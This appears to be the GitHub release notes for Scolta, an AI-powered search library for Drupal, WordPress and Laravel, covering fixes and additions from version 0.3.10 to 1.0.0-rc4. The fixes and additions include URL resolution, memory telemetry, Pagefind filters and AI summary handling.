  • Sort-intent prompt restructured as a 4-step decision sequence to eliminate false positives (discovery qualifiers) and false negatives (adverb+participle recency forms).

Added

  • showAttribution config option — opt-in "Powered by Scolta" display (default false), per WordPress.org Guideline 10.
  • .gitattributes export-ignore — dev files (tests/, .github/, benchmarks/, scripts/) excluded from git archive distributions.
  • AI Overview metadata enrichment — structured metadata per result with sort/filter indicators in LLM context.
  • Generic sort and filter prompt infrastructure: sortableFieldDescriptions, filterFields, filterFieldDescriptions config properties.
  • Memory pressure handling: gc_mem_caches() on PHP 8.3+, RSS-based 75% threshold voluntary restart.
  • Sort override subject filter — parallel subject-only search intersects with sorted results to prevent irrelevant items.
  • Pagefind native sort — sort hints now use Pagefind's index-level sort instead of client-side reranking.
  • Auto date sortable field: ContentItem::$date automatically included in sort attributes.
  • ContentItem::cloneWith() — safe field-level overriding without silent field loss.
  • Multi-value filter support in PagefindHtmlBuilder.
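
The sort override subject filter listed above amounts to an intersection that preserves the sorted order. A minimal sketch, assuming results are plain objects matched by a `url` field (the function name and the sample data are hypothetical):

```javascript
// Keep the sorted order, but drop any item the subject-only search did not return.
function intersectSortedWithSubject(sortedResults, subjectResults) {
  const subjectUrls = new Set(subjectResults.map((r) => r.url));
  return sortedResults.filter((r) => subjectUrls.has(r.url));
}

// Illustrative data only: a price-ascending list and a subject-only match set.
const sortedByPrice = [
  { url: '/product/cable', price: 3 },
  { url: '/product/quartz', price: 12 },
  { url: '/product/amethyst', price: 40 },
];
const subjectMatches = [{ url: '/product/amethyst' }, { url: '/product/quartz' }];
const filtered = intersectSortedWithSubject(sortedByPrice, subjectMatches);
// filtered keeps quartz, then amethyst (price order); the cable is dropped.
```

Filtering the sorted list, rather than sorting the subject list, keeps whatever ordering the index-level sort already produced.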

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc4/CHANGELOG.md

⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues

Scolta 1.0.0-rc3

13 May 15:04
cb8b78b

Third release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.

Highlights

  • Fixed inverted expand_primary_weight merge semantics. The WASM N-set merge was applying the configured weight to expanded results instead of original results, inverting the documented behavior. expand_primary_weight: 0.9 now correctly gives original query results 90% weight and expansion results 10%.
  • expandPrimaryWeight now included in expand-query API response payload.
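
To make the corrected weighting concrete, here is a sketch that assumes a simple linear blend of two scores. The real WASM N-set merge may combine scores differently; both function names are hypothetical.

```javascript
// Illustrative linear blend: the configured weight applies to the ORIGINAL query's score.
function blendScore(originalScore, expandedScore, expandPrimaryWeight) {
  return expandPrimaryWeight * originalScore + (1 - expandPrimaryWeight) * expandedScore;
}

// The inverted behavior described above, for comparison: weight applied to expanded results.
function blendScoreInverted(originalScore, expandedScore, expandPrimaryWeight) {
  return expandPrimaryWeight * expandedScore + (1 - expandPrimaryWeight) * originalScore;
}
```

With a weight of 0.9, a result found only by the original query keeps 90% of its score under `blendScore`, while under the inverted form it would keep roughly 10%.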

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc3/CHANGELOG.md

⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues

Scolta 1.0.0-rc2

12 May 18:55
b5dcce7

Second release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.

Changes since rc1

  • update-js-checksum composer script. Regenerates assets/js/scolta.js.sha256 after editing the canonical JS file: composer run update-js-checksum.
  • scolta.js auto_language_filter now overrides stale URL f_language params on language switch.
  • Pagefind filter index CBOR structure corrected to match Pagefind CLI output. Any filter-based search returned 0 results with the previous structure.
  • ScoltaConfig::fromArray() now coerces string values to the correct PHP type before assignment. Fixes TypeError crash on Drupal sites using drush config:set.
  • ScoltaConfig::$aiSummaryMaxTokens default restored to 512.
  • ScoltaConfig::$autoLanguageFilter added (default false). Language filter is now opt-in.
  • scolta.js filter sidebar counts restored from computeFilterCounts(allScoredResults).
  • auto indexer now always means PHP on all code paths.
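
The f_language override above can be sketched with the standard URLSearchParams API. This is an assumption-laden illustration: the helper name and the way the current language is passed in are hypothetical, and scolta.js may structure this differently.

```javascript
// Hypothetical helper: make the active language win over a stale f_language param.
function applyLanguageFilter(search, currentLanguage, autoLanguageFilter) {
  const params = new URLSearchParams(search);
  if (autoLanguageFilter) {
    // set() replaces any existing f_language value instead of appending a second one.
    params.set('f_language', currentLanguage);
  }
  return params.toString();
}
```

For example, `applyLanguageFilter('?q=zweig&f_language=en', 'de', true)` yields `q=zweig&f_language=de`, and with the option off the query string passes through unchanged.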

Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc2/CHANGELOG.md

⚠️ This is a release candidate. Please report any issues at https://github.com/tag1consulting/scolta-php/issues

Scolta 1.0.0-rc1

11 May 21:08
708c688

First stable release — all features from 0.3.x promoted to 1.0 API surface.

Fixed

  • scolta.js initPagefind() now uses a module-level pagefindInstance guard to prevent calling pagefind.init() more than once per page. Pagefind uses a SharedWorker that persists across navigations; calling init() a second time (e.g. on Drupal behavior re-attachment after a language switch) corrupts the WASM pointer permanently, causing "No pointer" errors and zero search results for the remainder of the tab session. The guard is stored in the outer IIFE scope so it spans all createInstance() calls on the same page.
  • Summarize endpoint no longer returns HTTP 400 on large result sets. The context parameter validation limit has been raised from 50,000 to 100,000 characters. The client truncates to 49,000 characters before sending, so this server-side limit acts as a safety net only.
  • IndexBuildOrchestrator now reports failure when the atomic swap or post-build sanity check fails. Two silent failure modes are closed: (1) atomicSwap() now throws RuntimeException if any rename() call returns false, so a failed filesystem rename can no longer cause a false-success result; (2) after the swap, verifyOutputHasFragments() checks that the pagefind output directory contains at least one .pf_fragment file when pages were processed — zero fragments after a non-empty build is treated as a hard failure. Both errors surface through the existing try/catch and are returned as success: false with a descriptive error string. (scolta-php#46)
  • ContentExporter::filterItems() no longer crashes on CachedContentReference objects during re-index. When a prior build's timestamp manifest exists, gather() yields a mix of ContentItem and CachedContentReference objects (cache-hit markers for unchanged posts). filterItems() previously accessed $item->bodyHtml on every item, which is not a property of CachedContentReference. Added an instanceof CachedContentReference type guard to pass cached items through without inspection. Fixes a PHP fatal error on WordPress, and on any other platform, for sites with a prior build.
  • AI summary max_tokens raised from 512 to 1024. The previous limit caused the AI to truncate mid-markdown on multi-result summaries — the last result was particularly vulnerable. The new default halves truncation frequency. The value is now configurable via ScoltaConfig::$aiSummaryMaxTokens.
  • cleanBrokenMarkdown() added to scolta.js before formatSummary() renders markdown to HTML. Mirrors the existing PHP MarkdownRenderer::cleanBrokenLinks() salvage logic: unclosed markdown links become bold text, unclosed bold/italic/backtick delimiters are closed. Prevents truncated AI output from producing broken HTML in the browser.
  • AiClient now auto-appends /v1/chat/completions to OpenAI base_url values that have no path. LiteLLM proxies (including Amazee.ai) return a base URL without a path component. Passing that URL directly caused 405 Method Not Allowed errors. When the base_url has no path (or only /), the standard OpenAI chat completions path is appended automatically. URLs that already contain a path are used as-is.
  • AmazeeClient::provisionTrial() and signIn() now parse the nested API response format, and token validation is removed from the provisioning path. The Amazee.ai /auth/generate-trial-access endpoint now returns credentials nested under a key object, and signIn wraps the access token under a token object. Both methods now check for the nested format first and fall back to the legacy flat format for backwards compatibility. The post-provisioning validateToken() call is removed from provisionTrial() because the /auth/me endpoint no longer exists on Amazee.ai's LiteLLM proxy — the token issued by the provisioning API is trusted directly.
  • scolta.js result URLs resolved against pagefind base path instead of site root. pagefindBase was stored as an absolute URL (with origin), but pagefind.js returns root-relative URLs after applying its baseUrl (a path, not an origin). The startsWith check never matched, so the pagefind prefix was never stripped — result links pointed to /wp-content/uploads/scolta/pagefind/product/… instead of /product/…. pagefindBase is now stored as a path-only value by stripping the origin via new URL().pathname when the pagefind path is absolute.
  • Adapter install — Drupal CI job failed because the release-validation workflow replaced the entire repositories array (wiping the packages.drupal.org/8 Drupal Packagist entry) instead of only swapping the local path repo for the GitHub VCS repo. The PHP inline script now filters out only the path-type scolta-php entry and appends the VCS repo, leaving other repository sources (including the Drupal Packagist) intact.
  • Search status message text no longer overflows on narrow viewports. .scolta-results-header now carries overflow-wrap: break-word and word-wrap: break-word, and its first-child <span> gains min-width: 0 so the flex item can shrink below its content size. Long messages (e.g. "— no exact matches found, showing partial matches") wrap correctly at 320 px, 768 px, 1024 px, and 1440 px viewport widths. (#51)
  • Memory profile documentation claimed "peak RSS ≤ 96 MB" for the conservative profile, but 96 MB is Scolta's internal allocation budget — total process RSS also includes the PHP runtime baseline (typically ~60 MB for Laravel CLI, ~80 MB for WordPress, ~130 MB for Drupal) and I/O overhead. PHPDoc for MemoryBudget::conservative(), MemoryBudgetSuggestion::suggest() reason strings, and checkProfileFit() warning messages now use "internal allocation budget" rather than "peak RSS". The README Memory and Scale section is updated with a platform baseline table and corrected estimates for total expected RSS per profile. The balanced and aggressive README comments ("~200 MB peak RSS" and "~384 MB peak RSS") are corrected to match the actual internal budget values (384 MB and 1 GB). (scolta-php#47)
  • HealthChecker no longer reports ai_configured: true when the API key is whitespace-only. The previous !empty() check treated strings containing only spaces or tabs as configured. Changed to trim() !== '' so only non-empty, non-whitespace keys (including Amazee.ai tokens stored as the API key) report as configured.
  • AI endpoints return HTTP 200 with empty data instead of 503 when no API key is configured. A new ApiKeyMissingException is thrown by AiClient when no API key is set. AiEndpointHandler catches it specifically — before the generic exception handler — and returns a graceful empty response: handleSummarize returns {} (no summary shown), handleExpandQuery returns the original query (no expansion), and handleFollowUp returns an empty response. Sites without AI configured no longer produce 503 console errors on every search. The scolta.js fetch catch blocks also now suppress TypeError (network unreachable / offline) silently rather than logging a warning or showing an error state, so search works normally when the AI endpoint is unreachable. (#50)
  • Tests added for CATEGORY and VARIETY rules in the summarize prompt template, and for {SITE_NAME} placeholder presence in all three templates. Both CMS adapters delegate to DefaultPrompts::getTemplate() at runtime; these tests lock in the template contracts so prompt drift is caught immediately if the canonical text is removed or emptied. (#49)
  • scolta.js result links no longer double the path on subdirectory installs. Result display URLs now prefer data.meta?.url (the verbatim URL stored in data-pagefind-meta by the binary indexer) over Pagefind's resolved data.url. Pagefind's JS client resolves stored root-relative paths against the pagefind base directory when building data.url, which on a subdirectory install (/drupal/web/) produces paths like /drupal/web/sites/default/files/scolta-pagefind/drupal/web/node/42. Using data.meta?.url avoids this resolution entirely; resolveUrl(data.url) is kept as the fallback for the PHP indexer path where data.meta.url is undefined. (scolta-drupal#40)
  • IndexBuildOrchestrator::build() now returns error: 'memory_abort' when MemoryTelemetry fires. The catch block detects RuntimeException messages containing "exceeds safe threshold" and returns a structured StatusReport with error: 'memory_abort', the number of chunks already committed, and the committed page count from the build manifest. Framework adapters can now programmatically distinguish a memory abort from other failures and spawn a fresh --resume process automatically.
  • Memory telemetry now measures actual RSS instead of PHP's allocator-reported memory. MemoryTelemetry reads VmRSS and VmHWM from /proc/self/status on Linux, falling back to memory_get_usage(true) / memory_get_peak_usage(true) when /proc is unavailable (macOS, Windows). Also reads cgroup v2/v1 memory limits (/sys/fs/cgroup/memory.max, /sys/fs/cgroup/memory/memory.limit_in_bytes) to determine the effective ceiling — on containerised/shared hosting the cgroup limit is often lower than memory_limit, and either one can SIGKILL the process. The 90% abort threshold and the heap-full guard in IndexBuildOrchestrator now use actual RSS against the effective limit. StatusReport.peakMemoryBytes now reports the RSS high-water mark (VmHWM) rather than PHP's monotonic memory_get_peak_usage(true).
  • **IndexBuildOrchestrator tail chun...
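
The initPagefind() guard described in the first entry of this list can be sketched as a once-only initializer held in an outer IIFE scope. This is a minimal illustration, not the scolta.js source: `loadPagefind` is a hypothetical stand-in for importing pagefind.js, and caching a promise (rather than the instance itself) is an assumption of the sketch.

```javascript
// Sketch of a once-only init guard held in an outer scope.
const scoltaSketch = (function () {
  let pagefindInstance = null; // shared by every caller on the same page

  async function initPagefind(loadPagefind) {
    if (pagefindInstance === null) {
      // Cache the promise so concurrent callers share a single init() call.
      // Note: in this sketch a failed init stays cached and is not retried.
      pagefindInstance = (async () => {
        const pagefind = await loadPagefind();
        await pagefind.init();
        return pagefind;
      })();
    }
    return pagefindInstance;
  }

  return { initPagefind };
})();
```

Because the guard lives outside any per-instance state, a second attachment on the same page receives the already-initialized object instead of calling init() again.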

v0.3.10

05 May 19:43
1555c7a

Fixed

  • WASM merge URL lookup now handles normalized URL formats: merge_results in WASM may normalize URLs (strip .html, trailing slash, lowercase) before deduplication, causing the JS result-data lookup to miss and fall back to a stub object. The data map now indexes each result under four key variants (raw, normalized, slash-stripped, both) and falls through them in order; misses are logged as [scolta:merge] WASM URL lookup missed.
  • Title deduplication threshold lowered to 0.6 Jaccard: the 0.7 threshold let near-duplicates through for short titles and multi-word proper nouns. The threshold is now 0.6, with an additional secondary condition: any pair sharing ≥3 words where the intersection covers ≥60% of the shorter title is also considered a duplicate.
  • AI Overview headings now render as HTML: #, ##, and ### markdown headings in AI summaries were falling through to <p> tags and displaying as raw # text. formatSummary() now maps them to <h3>/<h4>/<h5> elements.
  • AI summary now describes post-expansion results: summarizeResults() was firing in parallel with the expansion merge, so the AI described the Phase 1 literal-keyword ranking while the displayed results showed the semantically-reordered Phase 2 ranking. Summarization is now deferred until after mergeExpandedSearchResults() completes. A searchVersion staleness check prevents summarizing results from a superseded search.
  • Relative URLs from pagefind index are absolutized before use. ContentItem normalizes stored URLs to relative paths for portability, but the JS needs absolute URLs in two places: the summarize API call (so the AI can include working links in the overview text) and result card <a> href attributes. Both now prepend window.location.origin when the URL starts with /.
  • ContentItem normalizes absolute URLs to relative paths — the pagefind index stores URLs verbatim into the binary .pf_fragment files at build time. When a DDEV local URL (https://myapp.ddev.site/path) was passed as ContentItem::$url, that domain was baked into the index and served as the click-through URL on the hosted demo. The constructor now strips scheme and host from any URL that contains ://, leaving only the path (and optional query/fragment). Relative URLs pass through unchanged. All platform adapters benefit automatically; no code changes needed in Drupal, WordPress, or Laravel integrations. Existing indexes must be rebuilt to get correct relative URLs.
  • stripHtml() now decodes HTML entities — the previous regex-only implementation stripped tags but left entities like &#8217; intact. escapeHtml() then double-encoded the &, causing titles and excerpts with curly quotes or other encoded characters to display as literal entity strings (e.g. Houston, We&#8217;ve Had a Problem). stripHtml() now uses DOM parsing (innerHTML/textContent) to both strip tags and decode entities in one pass.
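
The title deduplication rule above (0.6 Jaccard plus the shared-word condition) can be sketched as follows. The tokenization, the inclusive `>=` comparisons, and measuring the "shorter title" by unique word count are assumptions of this sketch, not confirmed details of the implementation.

```javascript
// Tokenization (lowercase, split on non-alphanumerics) is an assumption of this sketch.
function titleWords(title) {
  return new Set(title.toLowerCase().split(/[^a-z0-9]+/).filter(Boolean));
}

function isDuplicateTitle(a, b) {
  const wordsA = titleWords(a);
  const wordsB = titleWords(b);
  const shared = [...wordsA].filter((w) => wordsB.has(w)).length;
  const union = wordsA.size + wordsB.size - shared;
  if (union === 0) return false;

  // Primary rule: Jaccard similarity (shared / union) of at least 0.6.
  if (shared / union >= 0.6) return true;

  // Secondary rule: at least 3 shared words covering at least 60% of the shorter title.
  const shorter = Math.min(wordsA.size, wordsB.size);
  return shared >= 3 && shared / shorter >= 0.6;
}
```

The secondary rule catches pairs where one title is much longer than the other, which drags the Jaccard ratio down even when the shorter title is mostly contained in the longer one.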

Added

  • ContentItem::$filters and PagefindHtmlBuilder extra-filter support — a new optional filters: array<string, string> parameter on ContentItem lets platform adapters attach arbitrary Pagefind filter attributes (e.g. ['base_topic' => 'Cardiology']) that bypass HtmlCleaner and are emitted directly as <span data-pagefind-filter="key:value" hidden> elements in the exported HTML. InvertedIndexBuilder merges these into the page's filters map so the PHP indexer path also exposes them. Use case: topic-family deduplication, faceted navigation, or any per-document filter that should not be derived from body text.
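
The emitted markup for extra filters can be illustrated with a small renderer. The library does this in PHP inside PagefindHtmlBuilder; the JavaScript below is only a sketch of the output shape, with hypothetical function names and an assumed empty span body.

```javascript
// Escape the characters that matter inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hypothetical renderer: one hidden span per filter key/value pair.
function renderFilterSpans(filters) {
  return Object.entries(filters)
    .map(([key, value]) => `<span data-pagefind-filter="${escapeAttr(`${key}:${value}`)}" hidden></span>`)
    .join('\n');
}
```

Calling `renderFilterSpans({ base_topic: 'Cardiology' })` produces a single hidden span whose attribute value is `base_topic:Cardiology`.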

Changed

  • content_catalog preset gains expand_primary_weight: 0.9 — validation testing showed that intent-based queries ("something about space") return zero raw pagefind results because stop words dominate the query. The AI expands to useful terms ("astronomy, celestial bodies") but at the old weight (default 0.5) those expanded results were diluted by the empty primary set. 0.9 gives AI-expanded results nearly equal weight to primary results, recovering the intent-based query path. Raised from implicit default (0.5) to 0.9.
  • ecommerce preset expand_primary_weight raised to 0.8 — validation testing showed that natural-language product queries ("sparkly blue gift") succeed with AI expansion but the 0.7 weight left expanded results slightly under-weighted. 0.8 brings better balance for informal shopping queries without sacrificing precision for specific product name queries. Raised from 0.7 to 0.8.